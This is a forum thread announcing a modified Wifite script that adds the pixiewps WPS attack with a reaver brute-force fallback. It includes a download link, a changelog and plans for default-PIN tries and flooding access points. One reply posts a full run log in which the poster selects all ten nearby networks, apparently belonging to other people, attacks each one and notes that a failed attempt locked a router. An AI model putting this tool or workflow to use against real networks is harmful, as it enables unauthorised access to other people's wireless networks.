Page 1 of 13 12311 ... LastLast
Results 1 to 10 of 123

Thread: Wifite including new pixiewps attack

  1. #1
    Senior Member
    Join Date
    Mar 2015
    Posts
    138

    Wifite including new pixiewps attack

    Figured i would just make it it's own thread so it doesn't get lost in everything else.
    Let me know if there are any problems or ideas, still kinda playing around with this and a few other ideas i kinda want to add.

    REQUIRES: Need to have pixiewps and t6x modified reaver installed

    ADDED: Support for new pixiewps attack, attempts a pixiewps attack and if successful passes the key to reaver to test. If fails, continues 11,000 key brute force with reaver.
    Now reports if wps is locked in scanning window(annoyed the excriment out of me that this wasn't shown.)

    ToDo: Maybe add some default pin calculations and checking.
    Make attacks a little more chipset specific(like attemting pin 42000648 on known vulnerable routers, etc...)
    Add option to mdk3 the poopies out of AP in hopes of reseting it.(can't hurt)
    Add a dummy-check to not bork out if modified-reaver or pixiewps isn't installed... :-/

    Changelog:
    04202015 - added timeout to script to avoid hanging if ap doesn't respond
    added flag -pixiet <sec> #adjust timeout of pixie attack
    added flag -ponly #only use pixiewps attack on selected wps networks,
    fixed ctrl^c issue, will now ask to continue or exit completely
    04212015 - added option to skip psk retreaval upon successful pixiewps attack, now runs reaver by default
    04222015 - added updater just run ./wifite -update to update to this fork instead of original wifite
    fixed timer
    fixed issue with new airmon-ng not creating monitor interface
    04232015 - fixed -mac not really anonymizing mac address
    added -endless flag to loop through targets
    made cracked.txt human readable(tab delimited instead of chr(0))
    fixed issue with -paddto not working
    can now anonymize iface already in monitor mode(via macchanger)

    Download:

    https://github.com/aanarchyy/wifite-mod-pixiewps
    Last edited by aanarchyy; 2015-04-24 at 02:34 AM.

  2. #2
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

    Wifite is also one the the few programs that handles new airmon-ng, well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

    I'll test this new version for both cases when I get home

  3. #3
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Quote Originally Posted by nuroo View Post
    Nice, glad you added new pixie attacks. Wifite is great program. Used it exclusively until pixiewps, and new reavers came out. Then I had to use the command line more.

    Wifite is also one the the few programs that handles new airmon-ng, well.
    new airmon-ng example:
    airmon-ng wlan3 = wlan3mon (not mon0)

    Im out at the moment, but wifite definitely worked when new airmon-ng already created new monitor interface, then run wifite. Cant remember if could create and use monitor interface of new airmon-ng from beginning. I'll report back

    I'll test this new version for both cases when I get home
    Let me know how it works, if it doesn't, then i should be able to fix it. I havent updated aircrack to test it yet but if it worked in wifite before, it should now also. I am obviously not the author nor even a contributor to wifite, this is just my own little 'fork' that i have found very usefull for myself, and i am releasing it incase it is usefull for anyone else.
    Last edited by aanarchyy; 2015-04-20 at 12:20 AM.

  4. #4
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

    This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.

  5. #5
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Quote Originally Posted by nuroo View Post
    Can confirm modified script works if monitor already running. Script picks up wlan3mon right away, and does its thing. If monitor interface is not running, scripts creates it. But since airmon-ng no longer produces mon0, it gets suck in a loop.

    This is only a problem for those that upgraded aircrack-ng suite. Im sure its flawless for everyone else.
    Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
    Can you confirm the pixiewps portion i added works?

  6. #6
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

    I can confirm pixiewps portion does work.

    ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

    I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.

  7. #7
    Senior Member
    Join Date
    Mar 2015
    Posts
    138
    Quote Originally Posted by nuroo View Post
    I had a hard times running it at first. The orginal wifite gets run, even if u run from downloaded directory. I renamed original and went back to download directory and yours ran.

    I can confirm pixiewps portion does work.

    ctrl c, doesn't function like old script however. for instance if attacking 10 targets. If I ctrl c, on 3rd target script ends. Doesn't target 4th. Or option to continue.

    I would like some timeouts for pixie attack. Needed. reaver will wait for long time for beacons, whole script hangs.
    Yeah the ctrl c part i have already noticed also and is on my list, still trying to figure out how the whole script meshes together.
    And yeah, i also noticed the hang while waiting for beacon, yeah a timeout is a good idea, ill look for a way to put that in.

    Thanks for helping me test this

    EDIT: Updated wifite to now timeout after 60 seconds(may make this configurable in the future) if pixiepws is not successful and move on to a regular reaver brute force. Though chances are that if the pixiewps attack fails, more than likely it's a reception/lockout issue in which a regular reaver brute-force attack would also fail.

    Bear with me, kinda learning python as i do this
    Last edited by aanarchyy; 2015-04-20 at 05:33 AM.

  8. #8
    Quote Originally Posted by aanarchyy View Post
    Will see if i can fix the monitor creation part of it, like i said, not the origional creator of wifite ;-)
    Can you confirm the pixiewps portion i added works?
    You have fixed it yet?

  9. #9
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Good news aanarchyy. Im happy to help. Awesome job so far. I wanna learn scripting too, for now help test.

    Will try new version, report back.

  10. #10
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    Just so I can run original and your wifite, I renamed yours wifitemod:

    Heres output with new version with pixiewps timeout:
    Code:
    ~/wifite-mod-pixiewps-master# ./wifitemod -wps
    
      .;'                     `;,    
     .;'  ,;'             `;,  `;,   WiFite v2 (r85)
    .;'  ,;'  ,;'     `;,  `;,  `;,  
    ::   ::   :   ( )   :   ::   ::  automated wireless auditor
    ':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
     ':.  ':.    /___\    ,:'  ,:'   designed for Linux
      ':.       /_____\      ,:'     
               /       \             
    
    modified by aanarchyy(aanarchyy@gmail.com)
    Credits to wiire,DataHead,soxrok2212,nxxxu
    
     [+] targeting WPS-enabled networks
    
     [+] scanning for wireless devices...
     [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
     [0:00:04] scanning wireless networks. 0 targets and 0 clients found   
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  FiOS-S****             1  WPA2  23db   wps 
        3  SprintGatew****      1  WPA2  21db   wps 
    
     [0:00:32] scanning wireless networks. 3 targets and 2 clients found   
     [+] checking for WPS compatibility... done
     [+] removed 47 non-WPS-enabled targets
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  DG167****              1  WPA2  36db   Locked 
        2  TG167****             11  WPA2  25db   wps 
        3  FiOS-S****             1  WPA2  24db   wps 
        4  TDS                    6  WPA2  22db   wps 
        5  TG167****              1  WPA2  21db   wps 
        6  MiamiHEAT             11  WPA2  20db   wps 
        7  U10C0****             1  WPA   18db   wps 
        8  SprintGate****      1  WPA2  18db   wps 
        9  DIRECT-pm-BR****       1  WPA2  18db   wps 
       10  DG167****              1  WPA2  15db   wps 
    
     [+] select target numbers (1-10) separated by commas, or 'all': all
    
     [+] 10 targets selected.
    
     [0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on DG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
    ^C0:00:18] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 9 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)
    
     [!] unable to complete successful try in 60 seconds
     [+] skipping pixiewps on TG167****
    
     [+] Pixiewps attack failed!
    
     [0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
    ^C0:00:22] WPS attack, 0/0 success/ttl, 
     (^C) WPS brute-force attack interrupted
    
     [+] 8 targets remain
     [+] what do you want to do?
         [c]ontinue attacking targets
         [e]xit completely
     [+] please make a selection (c, or e): c
    
     [0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
     [+] E-Nonce found
     [+] PKE hash found
     [+] PKR hash found
     [+] E-Hash1 found
     [+] E-Hash2 found
    Traceback (most recent call last):
      File "./wifitemod", line 3124, in <module>
        main()
      File "./wifitemod", line 321, in main
        need_handshake = not wps_attack(iface, t)
      File "./wifitemod", line 2912, in wps_attack
        line = f.readline()
    UnboundLocalError: local variable 'f' referenced before assignment
    Timeout for pixie worked. but another error above.
    Please make pixie timeout configureable.
    also option if pixewps fail, no brutefructe, move to next target.
    Please consider because failed attempt locked router
    Code:
    For those wondering what reavers -P option is intended for:
    
    Option (-P) in reaver puts reaver into a loop mode that does not do the  WPS protocol to or past the M4 message to hopefully avoid lockouts. This  is to ONLY be used for PixieHash collecting to use with pixiewps, NOT  to 'online' bruteforce pins.
    This option was made with intent of:
    
    ----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
    
    ----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
    
    ----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.                         
    by datahead

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •